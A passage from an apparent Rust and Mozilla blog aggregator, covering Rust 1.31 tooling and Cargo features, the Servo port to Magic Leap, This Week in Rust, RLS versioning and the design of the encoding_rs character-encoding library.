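Putting those commands together, a typical local setup (plus the CI check mentioned above) looks like this:

$ rustup component add clippy
$ rustup component add rustfmt
$ cargo clippy
$ cargo fmt -- --check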

IDE support is one of the most requested tooling features for Rust. There are now multiple, high-quality options to choose from.

Work on IDE support is not finished, in particular code completion is not up to scratch in the RLS-based editors. However, if you mainly want support for types, documentation, and 'go to def', etc. then you should be happy.

If you have problems installing any of the tools with Rustup, try running rustup self update, and then try again.

Tool lints

In Rust 1.30, we stabilized "tool attributes", like #[rustfmt::skip]. In Rust 1.31, we're stabilizing something similar: "tool lints," like #[allow(clippy::bool_comparison)]. These give a namespace to lints, so that it's more clear which tool they're coming from.

If you previously used Clippy's lints, you can migrate like this:

// old
#![cfg_attr(feature = "cargo-clippy", allow(bool_comparison))]

// new
#![allow(clippy::bool_comparison)]

You don't need cfg_attr anymore! You'll also get warnings that can help you update to the new style.

Documentation

Rustdoc has seen a number of improvements this year, and we also shipped a complete rewrite of "The Rust Programming Language." Additionally, you can buy a dead-tree copy from No Starch Press!

We had previously called this the "second edition" of the book, but since it's the first edition in print, that was confusing. We also want to periodically update the print edition as well. In the end, after many discussions with No Starch, we're going to be updating the book on the website with each release, and No Starch will periodically pull in our changes and print them. The book has been selling quite well so far, raising money for Black Girls Code.

You can find the new TRPL here.

Domain working groups

We announced the formation of four working groups this year:

  • Network services
  • Command-line applications
  • WebAssembly
  • Embedded devices

Each of these groups has been working very hard on a number of things to make Rust awesome in each of these domains. Some highlights:

  • Network services has been shaking out the Futures interface, and async/await on top of it. This hasn't shipped yet, but we're close!
  • The CLI working group has been working on libraries and documentation for making awesome command-line applications.
  • The WebAssembly group has been shipping a ton of world-class tooling for using Rust with wasm.
  • Embedded devices has gotten ARM development working on stable Rust!

You can find out more about this work on the new website!

New Website

Last week we announced a new iteration of the web site. It's now been promoted to rust-lang.org itself!

There's still a ton of work to do, but we're proud of the year of work that it took by many people to get it shipped.

Library stabilizations

A bunch of From implementations have been added:

  • u8 now implements From<NonZeroU8>, and likewise for the other numeric types and their NonZero equivalents
  • Option<&T> implements From<&Option<T>>, and likewise for &mut
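
For example, here is a minimal sketch of what those impls let you write (assuming Rust 1.31 or later):

use std::num::NonZeroU8;

fn main() {
    // u8: From<NonZeroU8>
    let n = NonZeroU8::new(5).unwrap();
    let plain = u8::from(n);
    assert_eq!(plain, 5);

    // Option<&T>: From<&Option<T>>
    let opt = Some(String::from("hi"));
    let borrowed: Option<&String> = Option::from(&opt);
    assert_eq!(borrowed, opt.as_ref());
}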

Additionally, a number of library functions have been stabilized.

See the detailed release notes for more.

Cargo features

Cargo will now download packages in parallel using HTTP/2.

Additionally, now that extern crate is not usually required, it would be jarring to do extern crate foo as bar; to rename a crate. As such, you can do so in your Cargo.toml, like this:

[dependencies]
baz = { version = "0.1", package = "foo" }

or, equivalently:

[dependencies.baz]
version = "0.1"
package = "foo"

Now the foo package can be referred to as baz in your code.
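
A hypothetical sketch of what that looks like in source (do_thing stands in for whatever foo actually exports):

// src/main.rs: `foo` was renamed to `baz` in Cargo.toml above
use baz::do_thing; // hypothetical item, for illustration only

fn main() {
    do_thing();
}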

See the detailed release notes for more.

Contributors to 1.31.0

At the end of release posts, we normally thank the people who contributed to this release. But for this release, more so than others, this list does not truly capture the amount of work and the number of people who have contributed. Each release is only six weeks, but this release is the culmination of three years of effort, in countless repositories, by numerous people. It's been a pleasure to work with you all, and we look forward to continuing to grow in the next three years.

The Servo BlogExperience porting Servo to the Magic Leap One

Introduction

We now have nightly releases of Servo for the Magic Leap One augmented reality headset. You can head over to https://download.servo.org/, install the application, and browse the web in a virtual browser.

(Image: Magic Leap Servo)

This is a developer preview release, designed as a testbed for future products and as a venue for experimenting with UI design. What should the web look like in augmented reality? We hope to use Servo to find out!

We are providing these nightly snapshots to encourage other developers to experiment with AR web experiences. There are still many missing features, including support for immersive or 3D content, many types of user input, media, and a stable embedding API. We hope you forgive the rough edges.

This blog post will describe the experience of porting Servo to a new architecture, and is intended for system developers.

Magic Leap under the hood

The Magic Leap software development kit (SDK) is based on commonly-used open-source technologies. In particular, it uses the clang compiler and the gcc toolchain for support tools such as ld, objcopy, ranlib and friends.

The architecture is 64-bit ARM, using the same application binary interface as Android. Together these make the build target aarch64-linux-android, the same as for many 64-bit Android devices. Unlike Android, Magic Leap applications are native programs and do not require a Java Native Interface (JNI) to the OS.

Magic Leap provides a lot of support for developing AR applications, in the form of the Lumin Runtime APIs, which include 3D scene descriptions, UI elements, input events including device placement and orientation in 3D space, and rendering to displays which provide users with 3D virtual visual and audio environments that interact with the world around them.

The Magic Leap and Lumin Runtime SDKs are available from https://creator.magicleap.com/ for Mac and Windows platforms.

Building the Servo library

The Magic Leap library is built using ./mach build --magicleap, which under the hood calls cargo build --target=aarch64-linux-android. For most of the Servo library and its dependencies, this just works, but there are a couple of corner cases: C/C++ libraries and crates with special treatment for Android.

Some of Servo’s dependencies are crates which link against C/C++ libraries, notably openssl-sys and mozjs-sys. Each of these libraries uses slightly different build environments (such as Make, CMake or Autoconf, often with custom build scripts). The challenge for software like Servo that uses many such libraries is to find a configuration which will work for all the dependencies. This comes down to finding the right settings for environment variables such as $CFLAGS, and is complicated by cross-compiling the libraries which often means ensuring that the Magic Leap libraries are included, not the host libraries.

The other main source of issues with the build is that since Magic Leap uses the same ABI as Android, its target is aarch64-linux-android, which is the same as for 64-bit ARM Android devices. As a result, many crates which need special treatment for Android (for example for JNI or to use libandroid) will treat the Magic Leap build as an Android build rather than a Linux build. Some care is needed to undo all of this special treatment. For example, the build scripts of Servo, SpiderMonkey and OpenSSL all contain code to guess the directory layout of the Android SDK, which needs to be undone when building for Magic Leap.

Debugging in vscode

One thing that just worked turned out to be debugging Rust code on the Magic Leap device. Magic Leap supports the Visual Studio Code IDE, and remote debugging of code running natively. It was great to see the debugging working out of the box for Rust code as well as it did for C++.

Building the Magic Leap application

The first release of Servo for Magic Leap comes with a rudimentary application for browsing 2D web content. This is missing many features, such as immersive 3D content, audio or video media, or user input by anything other than the controller.

Magic Leap applications come in two flavors: universe applications, which are immersive experiences that have complete control over the device, and landscape applications, which co-exist and present the user with a blended experience where each application presents part of a virtual scene. Currently, Servo is a landscape application, though we expect to add a universe application for immersive web content.

Landscape applications can be designed using the Lumin Runtime Editor, which gives a visual presentation of the various UI components in the scene graph.

(Image: Lumin Runtime Editor)

The most important object in Servo’s scene graph is the content node, since it is a Quad that can contain a 2D resource. One of the kinds of resource that a Quad can contain is an EGL context, that Servo uses to render web content. The runtime editor generates C++ code that can be included in an application to render and access the scene graph; Servo uses this to access the content node, and the EGL context it contains.

The other hooks that the Magic Leap Servo application uses are for events such as moving the laser pointer, which are mapped to mouse events, a heartbeat for animations or other effects which must be performed on the main thread, and a logger which bridges Rust’s logging API to Lumin’s.

The Magic Leap application is built each night by Servo's CI system, using the Mac builders since there is no Linux SDK for Magic Leap. This builds the Servo library and packages it as a Magic Leap application, which is hosted on S3 and linked to from the Servo download page.

Summary

The pull request that added Magic Leap support to Servo is https://github.com/servo/servo/pull/21985 which adds about 1600 lines to Servo, mostly in the build scripts and the Magic Leap application. Work on the Magic Leap port of Servo started in early September 2018, and the pull request was merged at the end of October, so took about two person-months.

Much of the port was straightforward, due to the maturity of the Rust cross-compilation and build tools, and the use of common open-source technologies in the Magic Leap platform. Lumin OS contains many innovative features in its treatment of blending physical and virtual 3D environments, but it is built on a solid open-source foundation, which makes porting a complex application like Servo relatively straightforward.

Servo is now making its first steps onto the Magic Leap One, and is available for download and experimentation. Come try it out, and help us design the immersive web!

This Week In RustThis Week in Rust 263

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is cargo-call-stack, a cargo subcommand for whole-program call stack analysis. Thanks to Jorge Aparicio for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

254 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Asia Pacific
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

The bug I did not have

– /u/pacman82's reddit post title

Thanks to Felix for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Cameron KaiserEdge gets Chrome-plated, and we're all worse off

I used to think that WebKit would eat the world, but later on I realized it was Blink. In retrospect this should have been obvious when the mobile version of Microsoft Edge was announced to use Chromium (and not Microsoft's own rendering engine EdgeHTML), but now rumour has it that Edge on its own home turf -- Windows 10 -- will be Chromium too. Microsoft engineers have already been spotted committing to the Chromium codebase, apparently for the ARM version. No word on whether this next browser, codenamed Anaheim, will still be called Edge.

In the sense that Anaheim won't (at least in name) be Google, just Chromium, there's reason to believe that it won't have the repeated privacy erosions that have characterized Google's recent moves with Chrome itself. But given how much DNA WebKit and Blink share, that means there are effectively two current major rendering engines left: Chromium and Gecko (Firefox). The little ones like NetSurf, bless its heart, don't have enough marketshare (or currently features) to rate, Trident in Internet Explorer 11 is intentionally obsolete, and the rest are too deficient to be anywhere near usable (Dillo, etc.). So this means Chromium arrogates more browsershare to itself and Firefox will continue to be the second class citizen until it, too, has too small a marketshare to be relevant. Then Google has eaten the Web. And we are worse off for it.

Bet Mozilla's reconsidering that stupid embedding decision now.

Nick CameronMore on RLS version numbering

In a few days the 2018 edition is going to roll out, and that will include some new framing around Rust's tooling. We've got a core set of developer tools which are stable and ready for widespread use. We're going to have a blog post all about that, but for now I wanted to address the status of the RLS, since when I last blogged about a 1.0 pre-release there was a significant sentiment that it was not ready (and given the expectations that a lot of people have, we agree).

The RLS has been in 0.x-stage development. We think it has reached a certain level of stability and usefulness. While it is not at the level of quality you might expect from a mature IDE, it is likely to be useful for a majority of users.

The RLS is tightly coupled with the compiler, and as far as backwards compatibility is concerned, that is the important thing. So from the next release, the RLS will share a version number with the Rust distribution. We are not claiming this as a '1.0' release; work is certainly not finished, but we think it is worth taking the opportunity of the 2018 edition to highlight the RLS as a usable and useful tool.

In the rest of this blog post I'll go over how the RLS works in order to give you an idea of what works well and what does not, and where we are going (or might go) in the future.

Background

The RLS is a language server for Rust - it is meant to handle the 'language knowledge' part of an IDE (c.f., editing, user interaction, etc.). The concept is that rather than having to develop Rust support from scratch in each editor or IDE, you can do it once in the language server and each editor can be a client. This is a recent approach to IDE development, in contrast to the approach of IntelliJ, Eclipse, and others, where the IDE is designed to make language support pluggable, but language support is closely tied to a specific IDE framework.

The RLS integrates with the Rust compiler, Cargo, and Racer to provide data. Cargo is used as a source of data for orchestrating builds. The compiler provides data for connecting references to definitions, and about types and docs (which is used for 'go to def', 'find all references', 'show type', etc.). Racer is used for code completion (and also to supply some docs). Racer can be thought of as a mini compiler which does as little as possible to provide code completion information as fast as possible.

The traditional approach to IDEs, and how Rust support in IntelliJ works, is to build a completely new compiler frontend, optimised for speed and incremental compilation. This compiler provides enough information to provide the IDE functionality, but usually doesn't do any code generation. This approach is much easier in fairly simple languages like Java, compared to Rust (macros, modules, and the trait system all make this a lot more complex).

There are trade-offs to the two approaches: using a separate compiler is fast, and functionality can be limited to ensure it is fast enough. However, there is a risk that the two compilers do not agree on how to compile a program; in particular, covering the whole of a language like Rust is difficult, so completeness can be an issue. Maintaining a separate compiler also takes a lot of work.

In the future, we hope to further optimise the Rust compiler for IDE cases so that it is fast enough that the user never has to wait, and to use the compiler for code completion. We also want to work with Cargo a bit differently so that there is less duplication of logic between Cargo and the RLS.

Current status

For each feature of the RLS, I measure its success along two axes: is it fast enough and is it complete (that is, does it work for all code). There are also non-functional issues of resource usage (how much battery and CPU the RLS is using), how often the RLS crashes, etc.

Go to definition

This is usually fast enough: if the RLS is ready, then it is pretty much instant. For large crates, it can take too long for the RLS to be ready, and thus we are not fast enough. However, usually using slightly stale data for 'go to def' is not a problem, so we're ok.

It is fairly complete. There are some issues around macros - if a definition is created by a macro, then we often have trouble. 'Go to def' is not implemented for lifetimes, and there are some places we don't have coverage (inside where clauses was recently fixed).

Show type

Showing types and documentation on hover has almost the same characteristics as 'go to definition'.

Rename

Renaming is similar to 'find all references' (and 'go to def'), but since we are modifying the user's code, there are some more things that can go wrong, and we want to be extra conservative. It is therefore a bit less complete than 'go to def', but similarly fast.

Code completion

Code completion is generally pretty fast, but often incomplete. This is because method dispatch in Rust is really complicated! Eventually, we hope that using the compiler for code completion rather than Racer will solve this problem.

Resource usage

The RLS is typically pretty heavy on the CPU. That is because we prioritise having results quickly over minimising CPU usage. In the future, making the compiler more incremental should give big improvements here.

Crashes

The RLS usually only crashes when it disagrees with Cargo about how to build a project, or when it exercises a code path in the compiler which would not be used by a normal compile, and that code path has a bug. While crashes are more common than I'd like, they're a lot rarer than they used to be, and should not affect most users.

Project structure

There is a remarkable variety in the way a Rust project can be structured. Multiple crates can be arranged in many ways (using workspaces, or not), build scripts and procedural macros cause compile-time code execution, and there are Cargo features, different platforms, tests, examples, etc. This all interacts with code which is edited but not yet saved. Every different configuration can cause bugs.

I think we are mostly doing well here, as far as I know there are no project structures to avoid (but this has been a big source of trouble in the past).

Overall

The RLS is clearly not done. It's not in the same league as IDE support for more mature languages. However, I think that it is at a stage where it is worth trying for many users. Stability is good enough - it's unlikely you'll have a bad experience. It does somewhat depend on how you use an IDE: if you rely heavily on code completion (in particular, if you use code completion as a learning tool), then the RLS is probably not ready. However, we think we should encourage new users to Rust to try it out.

So, while I agree that the RLS is not 'done', neither is it badly unstable, likely to disappear, or lacking in basic functionality. For better or worse, 1.0 releases seem to have special significance in the Rust community. I hope the version numbering decision sends the right message: we're ready for all Rust users to use the RLS, but we haven't reached 'mission accomplished' (well, maybe in a 'George W Bush' way).

More on that version number

The RLS will follow the Rust compiler's version number, i.e., the next release will be 1.31.0. From a strict semver point of view this makes sense since the RLS is only compatible with its corresponding Rust version, so incrementing the minor version with each Rust release is the right thing to do. By starting at 1.31, we're deliberately avoiding the 1.0 label.

In terms of readiness, it's important to note that the RLS is not a user-facing piece of software. I believe the 1.x version number is appropriate in that context - if you want to build an IDE, then the RLS is stable enough to use as a library. However, it is lacking some user-facing completeness and so an IDE built using the RLS should probably not use the 1.0 number (our VSCode extension will keep using 0.x).

The future

There's been some discussion about how best to improve the IDE experience in Rust. I believe the language server approach is the correct one, but there are several options to make progress: continue making incremental improvements to the compiler and RLS, moving towards compiler-driven code completion; use an alternate compiler frontend (such as Rust analyzer); improve Racer and continue to rely on it for code completion; some hybrid approach using more than one of these ideas.

When assessing these options, we need to take into account the likely outcome, the risk of something bad happening, the amount of work needed, and the long-term maintenance burden. The main downside of the current path is the risk that the compiler will never get fast enough to support usable code completion. Implementation is also a lot of work; however, that work would mostly also help with compile-time issues in general. With the other approaches there is a risk that we won't get the completeness needed for useful code completion. The implementation work is again significant, and depending on how things pan out, there is a risk of much costlier long-term maintenance.

I've been pondering the idea of a hybrid approach: using the compiler to provide information about definitions (and naming scopes), and either Racer or Rust Analyzer to do the 'last mile' work of turning that into code completion suggestions (and possibly resolving references too). That might mean getting the best of both worlds - the compiler can deal with a lot of complexity where speed is not as necessary, and the other tools get a helping hand with the stuff that has to be done quickly.

Orthogonally, there is also work planned to better integrate with Cargo and to support more features, as well as some 'technical debt' issues, such as better testing.

Mozilla VR BlogA new browser for Magic Leap

A new browser for Magic Leap

Today, we’re making available an early developer preview of a browser for the Magic Leap One device. This browser is built on top of our Servo engine technology and shows off high quality 2D graphics and font rendering through our WebRender web rendering library, and more new features will soon follow.

While we only support basic 2D pages today and have not yet built the full Firefox Reality browser experience and published this into the Magic Leap store, we look forward to working alongside our partners and community to do that early in 2019! Please try out the builds, provide feedback, and get involved if you’re interested in the future of mixed reality on the web in a cutting-edge standalone headset. And for those looking at Magic Leap for the first time, we also have an article on how the work was done.

Henri Sivonenencoding_rs: a Web-Compatible Character Encoding Library in Rust

encoding_rs is a high-decode-performance, low-legacy-encode-footprint and high-correctness implementation of the WHATWG Encoding Standard written in Rust. In Firefox 56, encoding_rs replaced uconv as the character encoding library used in Firefox. This wasn’t an addition of a component but an actual replacement: uconv was removed when encoding_rs landed. This writeup covers the motivation and design of encoding_rs, as well as some benchmark results.

Additionally, encoding_rs contains a submodule called encoding_rs::mem that’s meant for efficient encoding-related operations on UTF-16, UTF-8, and Latin1 in-memory strings—i.e., the kind of strings that are used in Gecko C++ code. This module is discussed separately after describing encoding_rs proper.

The C++ integration of encoding_rs is not covered here and is covered in another write-up instead.

TL;DR

Rust’s borrow checker is used with on-stack structs that get optimized away to enforce an “at most once” property that matches reads and writes to buffer space availability checks in legacy CJK converters. Legacy CJK converters are the most risky area in terms of memory-safety bugs in a C or C++ implementation.

Decode is very fast relative to other libraries with the exception of some single-byte encodings on ARMv7. Particular effort has gone into validating UTF-8 and converting UTF-8 to UTF-16 efficiently. ASCII runs are handled using SIMD when it makes sense. There is tension between making ASCII even faster vs. making transitions between ASCII and non-ASCII more expensive. This tension is the clearest when encoding from UTF-16, but it’s there when decoding, too.

By default, there is no encode-specific data other than 32 bits per single-byte encoding. This makes legacy CJK encode extremely slow by default relative to other libraries but still fast enough for the browser use cases. That is, the amount of text one could reasonably submit at a time in a form submission encodes so fast even on a Raspberry Pi 3 (standing in for a low-end phone) that the user will not notice. Even with only 32 bits of encode-oriented data, multiple single-byte encoders are competitive with ICU, though only windows-1252 applied to ASCII or almost-ASCII input is competitive with Windows system encoders. Faster CJK legacy encode is available as a compile-time option. But ideally, you should only be using UTF-8 for output anyway.

(If you just want to see the benchmarks and don’t have time for the discussion of the API and implementation internals, you can skip to the benchmarking section.)

Scope

Excluding the encoding_rs::mem submodule, which is discussed after encoding_rs proper, encoding_rs implements the character encoding conversions defined in the Encoding Standard as well as the mapping from labels (i.e. strings in protocol text that identify encodings) to encodings.

Specifically, encoding_rs does the following:

  • Decodes a stream of bytes in an Encoding Standard-defined character encoding into valid aligned native-endian in-RAM UTF-16 (units of u16).
  • Encodes a stream of potentially-invalid aligned native-endian in-RAM UTF-16 (units of u16) into a sequence of bytes in an Encoding Standard-defined character encoding as if the lone surrogates had been replaced with the REPLACEMENT CHARACTER before performing the encode. (Gecko’s UTF-16 is potentially invalid.)
  • Decodes a stream of bytes in an Encoding Standard-defined character encoding into valid UTF-8.
  • Encodes a stream of valid UTF-8 into a sequence of bytes in an Encoding Standard-defined character encoding. (Rust’s UTF-8 is guaranteed-valid.)
  • Does the above in streaming (input and output split across multiple buffers) and non-streaming (whole input in a single buffer and whole output in a single buffer) variants.
  • Avoids copying (borrows) when possible in the non-streaming cases when decoding to or encoding from UTF-8.
  • Resolves textual labels that identify character encodings in protocol text into type-safe objects representing those encodings conceptually.
  • Maps the type-safe encoding objects onto strings suitable for returning from document.characterSet.
  • Validates UTF-8 (in common instruction set scenarios a bit faster for Web workloads than the Rust standard library; hopefully will get upstreamed some day) and ASCII.
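
For a taste of the non-streaming API, here is a minimal sketch (it assumes encoding_rs as a Cargo dependency; the input bytes are "ハロー" in Shift_JIS):

use encoding_rs::{Encoding, SHIFT_JIS};

fn main() {
    // Non-streaming decode from Shift_JIS into Rust's UTF-8 string type.
    let bytes = b"\x83n\x83\x8d\x81[";
    let (text, encoding_used, had_errors) = SHIFT_JIS.decode(bytes);
    assert_eq!(encoding_used.name(), "Shift_JIS");
    assert!(!had_errors);
    assert_eq!(&text[..], "ハロー");

    // Resolving a protocol label to an encoding object.
    let enc = Encoding::for_label(b"latin1").unwrap();
    assert_eq!(enc.name(), "windows-1252");
}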

Notably, the JavaScript APIs defined in the Encoding Standard are not implemented by encoding_rs directly. Instead, they are implemented in Gecko as a thin C++ layer that calls into encoding_rs.

Why is a Character Encoding Conversion Library Even Needed Anymore?

The Web is UTF-8 these days and Rust uses UTF-8 as the in-RAM Unicode representation, so why is a character encoding conversion library even needed anymore? The answer is, of course, “for legacy reasons”.

While the HTML spec requires the use of UTF-8 and the Web is over 90% UTF-8 (according to W3Techs, whose methodology is questionable considering that they report e.g. ISO-8859-1 separately from windows-1252 and GB2312 separately from GBK even though the Web Platform makes no such distinctions, but Google hasn’t published their numbers since 2012), users still need to access the part of the Web that has not migrated to UTF-8 yet. That part does not consist only of ancient static pages, either. For example, in Japan there are still news sites that publish new content every day in Shift_JIS. Over here in Finland, I do my banking using a Web UI that is still encoded in ISO-8859-15.

Another side of the legacy is inside the browser engine. Gecko, JavaScript and the DOM API originate from the 1990s, when the way to represent Unicode in RAM was in 16-bit units, as can also be seen in other software from that era, such as Windows NT, Java, Qt and ICU. (Unicode was formally extended beyond 16 bits in Unicode 2.0 in 1996, but non-Private Use Characters were not assigned outside the Basic Multilingual Plane until Unicode 3.1 in 2001.)

Why a Rewrite?

Regardless of the implementation language, the character encoding library in Gecko was in need of a rewrite for three reasons:

  1. The addition of Rust code in Firefox brought about the need to be able to convert to and from UTF-8 directly and in terms of binary size, it didn’t make sense to have distinct libraries for converting to and from UTF-16 and for converting to and from UTF-8. Instead, a unified library using the same lookup tables for both was needed. The old code wasn’t designed to yield both UTF-16-targeting and UTF-8-targeting machine code from the same source. The addition of an efficient capability to decode to UTF-8 or to encode from UTF-8 would have involved a level of change comparable to a rewrite.

  2. The old library was crufty enough that it was easier to make correctness improvements by the means of a rewrite than by the means of incremental fixes.

    In Firefox 43, I had already rewritten the Big5 decoder and encoder in C++, because a rewrite was easier than modifying the old code. In that particular case, the old code used the Private Use Area (PUA) of the Basic Multilingual Plane (BMP) for Hong Kong Supplementary Character Set (HKSCS) characters. However, after the old code was written, HKSCS characters had been assigned proper code points in Unicode, but many of the assignments are on the Supplementary Ideographic Plane (Plane 2). When a fundamental assumption, such as all the characters in an encoding mapping to the BMP, no longer holds, a rewrite is easier than an incremental change.

    As another example (that showed up after the initial rewrite proposal but before the implementation got properly going), the ISO-2022-JP decoder had an XSS vulnerability that was difficult to fix without restructuring the existing code. I actually tried to write a patch for the old code and gave up.

    In general, the code structure of the old multi-byte decoders differed from the spec text so much that it would have been harder to try to figure out if the code does what the spec requires than to write new code according to the spec.

  3. The old code was written at a time when the exact set of behaviors that Web-exposed character encodings exhibit wasn’t fully understood. For this reason, the old code had generality that is no longer useful now that we know the full set of Web-exposed legacy encodings and can be confident that there will be no additional legacy encodings introduced with additional behaviors anymore.

    As the most notable example, the old code assumed that the lower half of single-byte encodings might not be ASCII. By the time of planning encoding_rs, single-byte encodings whose lower half wasn’t ASCII had already been removed as part of previous Encoding Standard-compliance efforts. Some of the multi-byte encoding handling code also had configurability for the single-byte mode that allowed for non-ASCII single-byte mode. However, some multi-byte encodings had already been migrated off the generic two-byte encoding handling code years ago.

    There had been generic two-byte encoding handling code, but it no longer made sense when only EUC-KR remained as an encoding exhibiting the generic characteristics. Big5 was able to decode to Plane 2, GBK had grown four-byte sequences as part of the evolution to GB18030, EUC-JP had grown support for three-byte sequences in order to support JIS X 0212 and Shift_JIS never had the EUC structure to begin with and had single-byte half-width katakana. Even EUC-KR itself had deviated from the original EUC structure by being extended to support all precomposed Hangul syllables (not just the ones in common use) in windows-949.

When a rewrite made sense in any case, it made sense to do the rewrite in Rust, because a rewrite of a clearly identifiable subsystem is exactly the kind of thing that is suitable for rewriting in Rust, and the problem domain could use memory-safety. The old library was created in early 1999, but it still had a buffer overrun discovered in it in 2016 (in code added in 2001 and 2002). This shows that the notion that code written in a memory-unsafe language becomes safe by being “battle-hardened” if it has been broadly deployed for an extended period of time is a myth. Memory-safety needs a systematic approach. Calendar time and broad deployment are not sufficient to turn unsafe code into safe code.

(The above-mentioned bug discovered in 2016 wasn’t the last uconv security bug to be fixed. In 2018, a memory-safety-relevant integer overflow bug was discovered in uconv after uconv had already been replaced with encoding_rs in non-ESR Firefox but uconv was still within security support in ESR. However, that bug was in the new Big5 code that I wrote for Firefox 43, so it can’t be held against the ancient uconv code. I had fixed the corresponding encoding_rs bug before encoding_rs landed in Firefox 56. The uconv bug was fixed in Firefox ESR 52.7.)

Why not ICU or rust-encoding?

As noted above, a key requirement was the ability to decode to and from both UTF-16 and UTF-8, but ICU supports only decoding to and from UTF-16 and rust-encoding supports only decoding to and from UTF-8. Perhaps one might argue that pivoting via another UTF would be fast enough, but experience indicated that pivoting via another UTF posed at least a mental barrier: Even after the benefits of UTF-8 as an in-memory Unicode representation were known, Gecko subsystems had been written to use UTF-16 because that was what uconv decoded to.

A further problem with ICU is that it does not treat the Encoding Standard as its conformance target. Chrome patches ICU substantially for conformance. I didn’t want to maintain a similar patch set in the Gecko context and instead wanted a library that treats the Encoding Standard as its conformance target.

The invasiveness of the changes to rust-encoding that would have been needed to meet the API design, performance and UTF-16 targeting goals would have been large enough that it made sense to pursue them in a new project instead of trying to impose the requirements onto an existing project.

API Design Problems

In addition to internal problems, uconv also had a couple of API design problems. First, the decoder API lacked the ability to signal the end of the stream. This meant that there was no way for the decoder to generate a REPLACEMENT CHARACTER when the input stream ended with an incomplete byte sequence. It was possible for the caller to determine from the status code if the last buffer passed to the decoder ended with an incomplete byte sequence, but then it was up to the caller to generate the REPLACEMENT CHARACTER in that situation even though the decoder was generally expected to provide this service. As a result, only one caller in the code base, the TextDecoder implementation, did the right thing. Furthermore, even though the encoder side had an explicit way to signal the end of the stream, it was a separate method leading to more complexity for callers than just being able to say that a buffer is the last buffer.

Additionally, the API contract was unclear on whether it was supposed to fill buffers exactly potentially splitting a surrogate pair across buffer boundaries or whether it was supposed to guarantee output validity on a per-method call basis. In a situation where the input and output buffers were exhausted simultaneously, it was unspecified whether the converter should signal that the input was exhausted or that the output was exhausted. In cases where it wasn’t the responsibility of the converter to handle the replacement of malformed byte sequences when decoding or unmappable characters when encoding, the API left needlessly much responsibility to the caller to advance over the faulty input and to figure out what the faulty input was in the case where that mattered, i.e. when encoding and producing numeric character references for unmappable characters.

Character encoding conversion APIs tend to exhibit common problems, so the above uconv issues didn’t make uconv particularly flawed compared to other character encoding conversion APIs out there. In fact, to uconv’s credit at least in the form that it had evolved into by the time I got involved, given enough output space uconv always consumed all the input provided to it. This is very important from the perspective of API usability. It’s all too common for character encoding conversion APIs to backtrack if the input buffer ends with an incomplete byte sequence and to report the incomplete byte sequence at the end of the input buffer as not consumed. This leaves it to the caller to take those unconsumed bytes and to copy them to the start of the next buffer so that they can be completed by the bytes that follow. Even worse, sometimes this behavior isn’t documented and is up to the caller of the API to discover by experimentation. This behavior also imposes a, typically undocumented, minimum input buffer size, because the input buffer has to be large enough for at least one complete byte sequence to fit. If the input trickles in byte by byte, it’s up to the caller to arrange them into chunks large enough to contain a complete byte sequence.

Sometimes, the API design problem described in the previous paragraph is conditional on requesting error reporting. When I was writing the Validator.nu HTML Parser, I discovered that the java.nio.charset character encoding conversion API was well-behaved when it was asked to handle errors on its own, but when the caller asked for the errors to be reported, the behavior undocumentedly changed to not consuming all the input offered even if there was enough output space. This was because the error reporting mechanism sought to designate the exact bytes in error by giving the caller the number of erroneous bytes corresponding to a single error. In order to make a single number make sense, the bytes always had to be counted backwards from the current position, which meant that the current position had to be placed such that it was at the end of the erroneous sequence and additionally the API sought to make it so that the entire erroneous sequence was in the buffer provided and not partially in a past already discarded buffer.

Additionally, as a more trivial to describe matter, but as a security-wise potentially very serious matter, some character encoding conversion APIs offer to provide a mode that ignores errors. Especially when decoding and especially in the context of input such as HTML that has executable (JavaScript) and non-executable parts, silently dropping erroneous byte sequences instead of replacing them with the REPLACEMENT CHARACTER is a security problem. Therefore, it’s a bad idea for character encoding conversion API to offer a mode where errors are neither signaled to the caller nor replaced with the REPLACEMENT CHARACTER.

Finally, some APIs fail to provide a high-performance streaming mode where the caller is responsible for output buffer allocation. (This means two potential failures: First, failure to provide a streaming mode and, second, providing a streaming mode but converter seeks to control the output buffer allocation.)

In summary, in my experience, common character encoding conversion API design problems are the following:

  • Failure to provide a streaming mode
    • E.g. the kernel32 conversion APIs
  • In streaming mode, failure to let the caller signal the end of the stream
    • E.g. uconv decode API and Qt (.NET can signal this but the documentation says the converter ignores the invalid bytes at the end in that case! I hope the docs are wrong.)
  • In streaming mode, having a separate API entry point for signaling the end of the stream (as opposed to being able to flag a buffer as the last buffer) resulting in two API entry points that can generate output
    • E.g. uconv encode API
  • In streaming mode, given sufficient output space, failure to consume all provided input
    • E.g. java.nio.charset in error reporting mode, rust-encoding and iconv
  • In streaming mode, seeking to identify which bytes were in error but doing so with too simplistic mechanism leading to also having to have the problem from the previous item
    • E.g. java.nio.charset
  • In streaming mode, causing memory allocation when a conversion call is on the stack (as opposed to letting the caller be fully in charge of allocating buffers)
    • E.g. Qt, WebKit and rust-encoding
  • In streaming mode, failure to guarantee that the exhaustion of the input buffer is the condition that is reported if both the input and output buffers are exhausted at the same time
    • E.g. uconv
  • In streaming mode, seeking to fill the output buffer fully (even if doing so e.g. splits a surrogate pair) instead of guaranteeing that the output is valid on a per-buffer basis
    • E.g. ICU by documentation; many others silent on this matter in documentation, so who knows
  • Providing a mode that silently ignores erroneous input sequences
    • E.g. rust-encoding, java.nio.charset

All but the last item are specific to a streaming mode. Streaming is hard.
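
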